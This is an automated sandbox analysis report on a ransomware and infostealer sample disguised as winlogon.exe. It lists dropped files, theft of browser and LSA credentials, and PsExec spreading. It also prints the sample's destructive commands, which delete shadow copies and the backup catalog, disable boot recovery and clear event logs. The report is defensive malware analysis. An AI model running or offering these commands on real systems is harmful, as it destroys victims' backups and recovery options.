
Analysis Report

Overview

General Information

Joe Sandbox Version: 20.0.0
Analysis ID: 46216
Start time: 21:37:49
Joe Sandbox Product: CloudBasic
Start date: 12.02.2018
Overall analysis duration: 0h 8m 27s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: winlogon.exe
Cookbook file name: default.jbs
Analysis system description: Windows 7 SP1 (with Office 2010 SP2, IE 11, FF 54, Chrome 60, Acrobat Reader DC 17, Flash 26, Java 8.0.1440.1)
Number of new started processes analysed: 26
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies
  • HCA enabled
  • EGA enabled
  • HDC enabled
Detection: MAL
Classification: mal100.evad.spre.rans.spyw.troj.winEXE@34/9@31/10
HCA Information:
  • Successful, ratio: 97%
  • Number of executed functions: 181
  • Number of non-executed functions: 171
EGA Information:
  • Successful, ratio: 100%
HDC Information:
  • Successful, ratio: 54.9% (good quality ratio 51.4%)
  • Quality average: 79%
  • Quality standard deviation: 29.3%
Cookbook Comments:
  • Adjust boot time
  • Found application associated with file extension: .exe
Warnings:
  • Connection to analysis system has been lost
  • Exclude process from analysis (whitelisted): conhost.exe, dllhost.exe
  • Report size getting too big, too many NtDeviceIoControlFile calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.


Detection

Strategy: Threshold
Score: 100
Range: 0 - 100
Reporting: Report FP / FN
Detection: malicious


Confidence

Strategy: Threshold
Score: 5
Range: 0 - 5
Further Analysis Required?: false


Classification

Analysis Advice

None of the domains contacted by the sample resolve; the sample is likely an old dropper which no longer works.
Sample drops PE files which have not been started; submit the dropped PE samples to Joe Sandbox for a secondary analysis.
Sample may offer command line options; please run it with the 'Execute binary with arguments' cookbook (the command line switches may require additional characters such as "-", "/" or "--").
Sample tries to load a library which is not present or installed on the analysis machine; adding the library might reveal more behavior.



Signature Overview



AV Detection:

Antivirus detection for dropped file
Source: C:\Users\HERBBL~1\AppData\Local\Temp\_usm.exe | virustotal: Detection: 59%
Antivirus detection for submitted file
Source: winlogon.exe | virustotal: Detection: 62%

Cryptography:

Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Users\user\Desktop\winlogon.exe | Code function: 1_2_00D64140 CryptAcquireContextW,CryptGenRandom,CryptReleaseContext,1_2_00D64140
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | Code function: 2_2_10001D60 GetFileAttributesA,GetTempPathA,GetTempFileNameA,CopyFileA,CryptUnprotectData,HeapAlloc,LocalFree,HeapFree,DeleteFileA,2_2_10001D60
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | Code function: 2_2_100010C0 StrStrIW,lstrlenW,CryptAcquireContextA,CryptCreateHash,CryptHashData,CryptDestroyHash,CryptReleaseContext,CryptGetHashParam,wsprintfA,wsprintfA,CryptDestroyHash,CryptReleaseContext,2_2_100010C0
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | Code function: 2_2_10001200 StrStrIW,lstrlenW,lstrlenW,lstrlenW,CryptUnprotectData,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,LocalFree,2_2_10001200

Spam, unwanted Advertisements and Ransom Demands:

Deletes shadow drive data (may be related to ransomware)
Source: unknown | Process created: C:\Windows\System32\vssadmin.exe c:\Windows\system32\vssadmin.exe delete shadows /all /quiet
Source: winlogon.exe | Binary or memory string: C:\Windows\system32\cmd.exe /c%s %s %sServicesActive%s\*...SeShutdownPrivilegec:\Windows\system32\vssadmin.exedelete shadows /all /quietwbadmin.exedelete catalog -quietbcdedit.exe/set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled nowevtutil.execl Systemcl SecurityH
Source: _usm.exe | Binary or memory string: C:\Windows\system32\cmd.exe /c%s %s %sServicesActive%s\*...SeShutdownPrivilegec:\Windows\system32\vssadmin.exedelete shadows /all /quietwbadmin.exedelete catalog -quietbcdedit.exe/set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled nowevtutil.execl Systemcl SecurityH
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\vssadmin.exe c:\Windows\system32\vssadmin.exe delete shadows /all /quiet
Source: cmd.exe | Binary or memory string: C:\Windows\system32\cmd.exe /c c:\Windows\system32\vssadmin.exe delete shadows /all /quiet
Source: cmd.exe | Binary or memory string: C:\Users\user\Desktop\C:\Windows\system32;;C:\Windows\system32;C:\Windows\system;C:\Windows;.;C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c c:\Windows\system32\vssadmin.exe delete shadows /all /quietC:\Windows\system32\cmd.exeWinSta0\Defaulto
Source: cmd.exe | Binary or memory string: C:\Windows\system32\cmd.exe /c c:\Windows\system32\vssadmin.exe delete shadows /all /quieth
Source: cmd.exe | Binary or memory string: ? c:\Windows\system32\vssadmin.exe delete shadows /all /quiet
Source: cmd.exe | Binary or memory string: ?c:\Windows\system32\vssadmin.exe delete shadows /all /quiettemn
Source: cmd.exe | Binary or memory string: 9C:\Windows\system32\cmd.exe/cc:\Windows\system32\vssadmin.exedeleteshadows/all/quietESSOR_LEVEL=6PROCESSOR_REVISION=3f02ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesPSModulePath=C:\Windows\system32\WindowsPowerShell\v1.0\Modules\;C:\Program Files\AutoIt3\AutoItXPUBLIC=C:\Users\PublicSystemDrive=C:SystemRoot=C:\WindowsTEMP=C:\Users\HERBBL~1\A(0
Source: vssadmin.exe | Binary or memory string: Lc:\Windows\system32\vssadmin.exedeleteshadows/all/quiet,
Source: vssadmin.exe | Binary or memory string: c:\Windows\system32\vssadmin.exe delete shadows /all /quiet
Source: vssadmin.exe | Binary or memory string: C:\Users\user\Desktop\c:\Windows\system32;;C:\Windows\system32;C:\Windows\system;C:\Windows;.;C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\c:\Windows\system32\vssadmin.exec:\Windows\system32\vssadmin.exe delete shadows /all /quietc:\Windows\system32\vssadmin.exe delete shadows /all /quietWinSta0\Default
Source: vssadmin.exe | Binary or memory string: Example Usage: vssadmin Delete ShadowStorage
Source: vssadmin.exe | Binary or memory string: Example Usage: vssadmin Delete Shadows /Type=ClientAccessible /For=C:
Source: vssadmin.exe | Binary or memory string: vssadmin Delete Shadows
Source: vssadmin.exe | Binary or memory string: Example Usage: vssadmin Delete Shadows /For=C: /Oldest
Source: vssadmin.exe | Binary or memory string: Example Usage: vssadmin Delete ShadowStorage /For=C: /On=D:
Source: _usm.exe.1.dr | Binary or memory string: C:\Windows\system32\cmd.exe /c%s %s %sServicesActive%s\*...SeShutdownPrivilegec:\Windows\system32\vssadmin.exedelete shadows /all /quietwbadmin.exedelete catalog -quietbcdedit.exe/set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled nowevtutil.execl Systemcl SecurityH
May disable shadow drive data (uses vssadmin)
Source: unknown | Process created: C:\Windows\System32\vssadmin.exe c:\Windows\system32\vssadmin.exe delete shadows /all /quiet
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\vssadmin.exe c:\Windows\system32\vssadmin.exe delete shadows /all /quiet

Networking:

Performs DNS lookups
Source: unknown | DNS traffic detected: queries for: 252.0.0.224.in-addr.arpa
Urls found in memory or binary data
Source: yegus.exe | String found in binary or memory: file:///C:/jbxinitvm.au3
Source: yegus.exe | String found in binary or memory: file:///C:/jbxinitvm.au3s
Source: yegus.exe | String found in binary or memory: http://certs.starfieldtech.com/repository/1402
Source: yegus.exe | String found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
Source: yegus.exe | String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: yegus.exe | String found in binary or memory: http://crl.thawte.com/ThawtePCA-G3.crl0
Source: yegus.exe | String found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0=
Source: yegus.exe | String found in binary or memory: http://crt.comodoca.com/COMODORSAAddTrustCA.crt0$
Source: yegus.exe | String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: yegus.exe | String found in binary or memory: http://ocsp.comodoca.com0
Source: yegus.exe | String found in binary or memory: http://ocsp.digicert.com0K
Source: yegus.exe | String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: yegus.exe | String found in binary or memory: http://ocsp.thawte.com0
Source: yegus.exe | String found in binary or memory: http://s.symcb.com/pca3-g5.crl0
Source: yegus.exe | String found in binary or memory: http://s.symcd.com0_
Source: yegus.exe | String found in binary or memory: http://t1.symcb.com/ThawtePCA.crl0/
Source: yegus.exe | String found in binary or memory: http://t2.symcb.com0A
Source: winlogon.exe, _wjg.exe.1.dr | String found in binary or memory: http://www.sysinternals.com
Source: yegus.exe | String found in binary or memory: https://d.symcb.com/cps0%
Source: yegus.exe | String found in binary or memory: https://d.symcb.com/rpa0
Source: yegus.exe | String found in binary or memory: https://www.digicert.com/CPS0
Source: yegus.exe | String found in binary or memory: https://www.thawte.com/cps0)
Source: yegus.exe | String found in binary or memory: https://www.thawte.com/cps07
Tries to resolve domain names, but no domain seems valid (expired dropper behavior)
Source: unknown | DNS traffic detected: query: 252.0.0.224.in-addr.arpa replaycode: Name error (3)
Tries to resolve many domain names, but no domain seems valid
Source: unknown | DNS traffic detected: query: 252.0.0.224.in-addr.arpa replaycode: Name error (3)

Stealing of Sensitive Information:

Contains functionality to dump credential hashes (LSA Dump)
Source: C:\Users\user\AppData\Local\Temp\ucngw.exe | Code function: 3_2_100114D0 LoadLibraryW,RtlInitUnicodeString,GetProcAddress,GetProcAddress,GetProcAddress,LocalAlloc,LocalAlloc,3_2_100114D0
Contains functionality to steal Chrome passwords
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | Code function: \Google\Chrome\User Data\Default\Login Data 2_2_10001FB0
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | Code function: \Google\Chrome\User Data\Default\Login Data 2_2_10001FB0
Contains functionality to steal Internet Explorer form passwords
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | Code function: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 2_2_10082020
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\4ah7hlda.default\cert8.db
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\4ah7hlda.default\secmod.db
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\4ah7hlda.default\logins.json
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\4ah7hlda.default\key3.db

Persistence and Installation Behavior:

Drops PE files
Source: C:\Users\user\Desktop\winlogon.exe | File created: C:\Users\HERBBL~1\AppData\Local\Temp\_yig.exe
Source: C:\Users\user\Desktop\winlogon.exe | File created: C:\Users\HERBBL~1\AppData\Local\Temp\_wjg.exe
Source: C:\Users\user\Desktop\winlogon.exe | File created: C:\Users\HERBBL~1\AppData\Local\Temp\ucngw.exe
Source: C:\Users\user\Desktop\winlogon.exe | File created: C:\Users\HERBBL~1\AppData\Local\Temp\_usm.exe
Source: C:\Users\user\Desktop\winlogon.exe | File created: C:\Users\HERBBL~1\AppData\Local\Temp\yegus.exe
May use bcdedit to modify the Windows boot settings
Source: winlogon.exe | Binary or memory string: C:\Windows\system32\cmd.exe /c%s %s %sServicesActive%s\*...SeShutdownPrivilegec:\Windows\system32\vssadmin.exedelete shadows /all /quietwbadmin.exedelete catalog -quietbcdedit.exe/set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled nowevtutil.execl Systemcl SecurityH
Source: _usm.exe | Binary or memory string: bcdedit.exe
Source: _usm.exe | Binary or memory string: C:\Windows\system32\cmd.exe /c%s %s %sServicesActive%s\*...SeShutdownPrivilegec:\Windows\system32\vssadmin.exedelete shadows /all /quietwbadmin.exedelete catalog -quietbcdedit.exe/set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled nowevtutil.execl Systemcl SecurityH
Source: cmd.exe | Binary or memory string: 'Abcdedit.exeV
Source: cmd.exe | Binary or memory string: 'Cbcdedit.exe
Source: cmd.exe | Binary or memory string: bcdedit.exe
Source: cmd.exe | Binary or memory string: indows\system32\bcdedit.exe
Source: cmd.exe | Binary or memory string: bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no
Source: cmd.exe | Binary or memory string: C:\Windows\system32\bcdedit.exeath\bcdedit.exe*}
Source: cmd.exe | Binary or memory string: bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures B
Source: cmd.exe | Binary or memory string: 1C:\Windows\system32\bcdedit.exe\??\C:\Windows\system32\bcdedit.exe
Source: cmd.exe | Binary or memory string: >C:\Windows\system32\cmd.exe/cbcdedit.exe/set{default}bootstatuspolicyignoreallfailures&bcdedit/set{default}recoveryenablednoamFiles=C:\Program FilesPSModulePath=C:\Windows\system32\WindowsPowerShell\v1.0\Modules\;C:\Program Files\AutoIt3\AutoItXPUBLIC=C:\Users\PublicSystemDrive=C:SystemRoot=C:\WindowsTEMP=C:\Users\HERBBL~1\AppData\Local\TempTMP=C:\Users\HERBBL~1\AppData\Local\TempUSERDOMAIN=computerUSERNAME=userUSERPROFILE=C:\Users\userwindir=C:\Windowswindows_tracing_flags=3windows_tracing_logfile=C:\BV
Source: cmd.exe | Binary or memory string: C:\Windows\system32\bcdedit.exe
Source: cmd.exe | Binary or memory string: InternalNamebcdedit.exe
Source: cmd.exe | Binary or memory string: OriginalFilenamebcdedit.exej%
Source: cmd.exe | Binary or memory string: C:\Windows\system32\cmd.exe /c bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no
Source: cmd.exe | Binary or memory string: C:\Users\user\Desktopbcdedit.exeB
Source: cmd.exe | Binary or memory string: indows\system32\bcdedit.exe.0\7
Source: cmd.exe | Binary or memory string: C:\Windows\system32\bcdedit.exeath\bcdedit*B
Source: cmd.exe | Binary or memory string: C:\Users\user\Desktop\C:\Windows\system32;;C:\Windows\system32;C:\Windows\system;C:\Windows;.;C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled noC:\Windows\system32\cmd.exeWinSta0\Defaultf
Source: cmd.exe | Binary or memory string: C:\Windows\system32\cmd.exe /c bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled noa
Source: cmd.exe | Binary or memory string: C:\Users\user\Desktop\C:\Windows\system32;C:\Windows\system32;C:\Windows\system;C:\Windows;.;C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\bC:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled nobcdedit /set {default} recoveryenabled nodWinSta0\Default=C:=C:\Users\user\Desktop=ExitCode=00000000=Z:=Z:\ALLUSERSPROFILE=C:\ProgramDataAPPDATA=C:\Users\user\AppData\RoamingCommonProgramFiles=C:\Program Files\Common FilesCOMPUTERNAME=computerComSpec=C:\Windows\system32\cmd.exeFP_NO_HOST_CHECK=NOHOMEDRIVE=C:HOMEPATH=\Users\userLOCALAPPDATA=C:\Users\user\AppData\LocalLOGONSERVER=\\computerNUMBER_OF_PROCESSORS=1OS=Windows_NTPath=C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSCPROCESSOR_ARCHITECTURE=x86PROCESSOR_IDENTIFIER=x
Source: bcdedit.exe | Binary or memory string: Microsoft.Windows.OSLoader.BCDEdit,processorArchitecture="x86",type="win32",version="5.1.0.0"C:\Windows\system32\bcdedit.exeGsHd(
Source: bcdedit.exe | Binary or memory string: @bcdedit.exe/set{default}bootstatuspolicyignoreallfailuresackburnLOCALAPPDATA=C:\Users\user\AppData\LocalLOGONSERVER=\\computerNUMBER_OF_PROCESSORS=1OS=Windows_NTPath=C:
Source: bcdedit.exe | Binary or memory string: bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
Source: bcdedit.exe | Binary or memory string: C:\Users\user\Desktop\C:\Windows\system32;C:\Windows\system32;C:\Windows\system;C:\Windows;.;C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\C:\Windows\system32\bcdedit.exebcdedit.exe /set {default} bootstatuspolicy ignoreallfailures bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures WinSta0\Default
Source: bcdedit.exe | Binary or memory string: \Device\HarddiskVolume2\Windows\System32\bcdedit.exe;##
Source: bcdedit.exe | Binary or memory string: bcdedit.exeBC:\Users\user\Desktop\
Source: bcdedit.exe | Binary or memory string: Microsoft.Windows.OSLoader.BCDEdit,processorArchitecture="x86",type="win32",version="5.1.0.0"C:\Windows\system32\bcdedit.exeGsHd(
Source: bcdedit.exe | Binary or memory string: bcdedit.exeBC:\Users\user\Desktop\
Source: bcdedit.exe | Binary or memory string: C:\Users\user\Desktop\C:\Windows\system32;C:\Windows\system32;C:\Windows\system;C:\Windows;.;C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled nobcdedit /set {default} recoveryenabled noWinSta0\Defaulti
Source: bcdedit.exe | Binary or memory string: hj4`=\Device\HarddiskVolume2\Windows\System32\bcdedit.exe;##
Source: _usm.exe.1.dr | Binary or memory string: C:\Windows\system32\cmd.exe /c%s %s %sServicesActive%s\*...SeShutdownPrivilegec:\Windows\system32\vssadmin.exedelete shadows /all /quietwbadmin.exedelete catalog -quietbcdedit.exe/set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled nowevtutil.execl Systemcl SecurityH
Uses bcdedit to modify the Windows boot settings
Source: unknown | Process created: C:\Windows\System32\bcdedit.exe bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
Source: unknown | Process created: C:\Windows\System32\bcdedit.exe bcdedit /set {default} recoveryenabled no
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\bcdedit.exe bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\bcdedit.exe bcdedit /set {default} recoveryenabled no

Data Obfuscation:

Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\winlogon.exe | Code function: 1_2_00D643A0 GetVersionExW,LoadLibraryW,GetProcAddress,SHGetKnownFolderPath,1_2_00D643A0
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\winlogon.exe | Code function: 1_2_00D6B696 push ecx; ret 1_2_00D6B6A9
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | Code function: 2_2_013348F6 push ecx; ret 2_2_01334909
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | Code function: 2_2_10083436 push ecx; ret 2_2_10083449
Source: C:\Users\user\AppData\Local\Temp\ucngw.exe | Code function: 3_2_00C51CE6 push ecx; ret 3_2_00C51CF9
Source: C:\Users\user\AppData\Local\Temp\ucngw.exe | Code function: 3_2_10001966 push ecx; ret 3_2_10001979
Source: C:\Users\user\AppData\Local\Temp\_usm.exe | Code function: 4_2_00142CC5 push ecx; ret 4_2_00142CD8

Spreading:

Contains functionality to enumerate / list files inside a directory
Source: C:\Users\user\Desktop\winlogon.exe | Code function: 1_2_00D75F8F FindFirstFileExW,1_2_00D75F8F
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | Code function: 2_2_01339A82 FindFirstFileExW,2_2_01339A82
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | Code function: 2_2_10088620 FindFirstFileExA,2_2_10088620
Source: C:\Users\user\AppData\Local\Temp\ucngw.exe | Code function: 3_2_00C5850A FindFirstFileExW,3_2_00C5850A
Source: C:\Users\user\AppData\Local\Temp\ucngw.exe | Code function: 3_2_10008EEC FindFirstFileExA,3_2_10008EEC
Source: C:\Users\user\AppData\Local\Temp\_usm.exe | Code function: 4_2_00141441 wsprintfW,FindFirstFileW,GetProcessHeap,PathAppendW,GetProcessHeap,HeapAlloc,PathAppendW,PathAppendW,StrCmpCW,StrCmpCW,StrCmpCW,CreateFileW,GetFileSizeEx,CloseHandle,GetProcessHeap,HeapFree,FindNextFileW,FindClose,4_2_00141441
Creates COM task schedule object (often to register a task for autostart)
Source: C:\Windows\System32\wbengine.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Windows\System32\wbengine.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Windows\System32\wbengine.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Progid
Source: C:\Windows\System32\wbengine.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Progid
Source: C:\Windows\System32\wbengine.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Windows\System32\wbengine.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
Source: C:\Windows\System32\wbengine.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
Source: C:\Windows\System32\wbengine.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Windows\System32\wbengine.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Found PSEXEC tool (often used for remote process execution)
Source: winlogon.exe | String found in binary or memory: PsExec executes a program on a remote system, where remotely executed console
Source: _wjg.exe.1.dr | String found in binary or memory: PsExec executes a program on a remote system, where remotely executed console

System Summary:

Submission file is bigger than most known malware samplesShow sources
Source: winlogon.exeStatic file information: File size 1861632 > 1048576
PE file has a big raw sectionShow sources
Source: winlogon.exeStatic PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x195c00
PE file contains a mix of data directories often seen in goodwareShow sources
Source: winlogon.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: winlogon.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: winlogon.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: winlogon.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: winlogon.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: winlogon.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Contains modern PE file flags such as dynamic base (ASLR) or NXShow sources
Source: winlogon.exeStatic PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
PE file contains a debug data directoryShow sources
Source: winlogon.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Binary contains paths to debug symbolsShow sources
Source: Binary string: KERBEROS.pdb source: ucngw.exe
Source: Binary string: msv1_0.pdb source: ucngw.exe
Source: Binary string: lsasrv.pdb source: ucngw.exe
PE file contains a valid data directory to section mappingShow sources
Source: winlogon.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: winlogon.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: winlogon.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: winlogon.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: winlogon.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Binary contains device paths (device paths are often used for kernel mode <-> user mode communication)Show sources
Source: _wjg.exe.1.drBinary string: Sysinternals RocksRtlNtStatusToDosErrorntdll.dllRtlInitUnicodeStringNtOpenFileNtFsControlFile\Device\Srv2\Device\LanmanServerSeTcbPrivilege"%s" %sNetIsServiceAccountnetapi32.dll_SA_{262E99C9-6160-4871-ACEC-4E61736B6F21}NT AUTHORITYNT SERVICECreateRestrictedTokenwinsta0Winlogondefaultwinsta0\winlogonwinsta0\defaultWow64DisableWow64FsRedirectionKernel32.dll%s.exefailed to readsecure: %d
Source: _wjg.exe.1.drBinary string: Sysinternals RocksRtlNtStatusToDosErrorntdll.dllRtlInitUnicodeStringNtOpenFileNtFsControlFile\Device\LanmanRedirector\%s\ipc$Use PsKill to terminate the remotely running program.
Classification label
Source: classification engine | Classification label: mal100.evad.spre.rans.spyw.troj.winEXE@34/9@31/10
Contains functionality to adjust token privileges (e.g. debug / backup)
Source: C:\Users\user\Desktop\winlogon.exe | Code function: 1_2_00D62B90 GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetTokenInformation,GetTokenInformation,LookupPrivilegeNameW,AdjustTokenPrivileges,CloseHandle | 1_2_00D62B90
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | Code function: 2_2_013335E0 GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetTokenInformation,GetTokenInformation,LookupPrivilegeNameW,AdjustTokenPrivileges,CloseHandle | 2_2_013335E0
Source: C:\Users\user\AppData\Local\Temp\ucngw.exe | Code function: 3_2_00C61A30 GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetTokenInformation,GetTokenInformation,LookupPrivilegeNameW,AdjustTokenPrivileges,CloseHandle | 3_2_00C61A30
Source: C:\Users\user\AppData\Local\Temp\_usm.exe | Code function: 4_2_001416E9 Wow64DisableWow64FsRedirection,LookupPrivilegeValueW,GetCurrentProcess,OpenProcessToken,AdjustTokenPrivileges,Wow64RevertWow64FsRedirection,CreateThread,Sleep,InitiateSystemShutdownExW,ExitProcess | 4_2_001416E9
Contains functionality to instantiate COM classes
Source: C:\Users\user\Desktop\winlogon.exe | Code function: 1_2_00D64C30 CoInitializeEx,CoInitializeSecurity,CredUIParseUserNameW,LocalAlloc,SysAllocString,SysAllocString,SysAllocString,SysAllocString,SysStringLen,SysStringLen,SysStringLen,SysStringLen,CoCreateInstance,SysFreeString,wsprintfW,SysAllocString,SysAllocString,SysAllocString,SysAllocString,CoSetProxyBlanket,CoSetProxyBlanket,SysAllocString,SysAllocString,SysFreeString,VariantClear,SysAllocString,SysAllocString,GetModuleFileNameW,CreateFileW,GetFileSize,SafeArrayCreate,SafeArrayAccessData,ReadFile,SafeArrayUnaccessData,CloseHandle,CloseHandle,SysFreeString,SysFreeString,SysFreeString,SysFreeString,SysFreeString,SysFreeString,SysFreeString,SysFreeString,LocalFree,CoUninitialize | 1_2_00D64C30
Contains functionality to load and extract PE file embedded resources
Source: C:\Users\user\Desktop\winlogon.exe | Code function: 1_2_00D6AAD0 GetModuleHandleW,FindResourceW,LoadResource,LockResource,SizeofResource | 1_2_00D6AAD0
Contains functionality to modify services (start/stop/modify)
Source: C:\Users\user\AppData\Local\Temp\_usm.exe | Code function: 4_2_001412E8 OpenSCManagerW,EnumServicesStatusW,EnumServicesStatusW,GetProcessHeap,GetProcessHeap,RtlAllocateHeap,EnumServicesStatusW,QueryServiceConfigW,OpenServiceW,QueryServiceConfigW,GetProcessHeap,HeapAlloc,ChangeServiceConfigW,QueryServiceConfigW,PathRemoveArgsW,GetProcessHeap,HeapFree,GetLastError,CloseServiceHandle,GetProcessHeap,HeapFree,CloseServiceHandle | 4_2_001412E8
Creates files inside the user directory
Source: C:\Users\user\Desktop\winlogon.exe | File created: C:\Users\Public\A9E5CC701A2E98F9114060D6645A7A5B
Creates temporary files
Source: C:\Users\user\Desktop\winlogon.exe | File created: C:\Users\HERBBL~1\AppData\Local\Temp\yegus.exe
Might use command line arguments
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | Command line argument: <NULL> | 2_2_013338C0 (reported 2 times)
Source: C:\Users\user\AppData\Local\Temp\ucngw.exe | Command line argument: <NULL> | 3_2_00C61EC0 (reported 2 times)
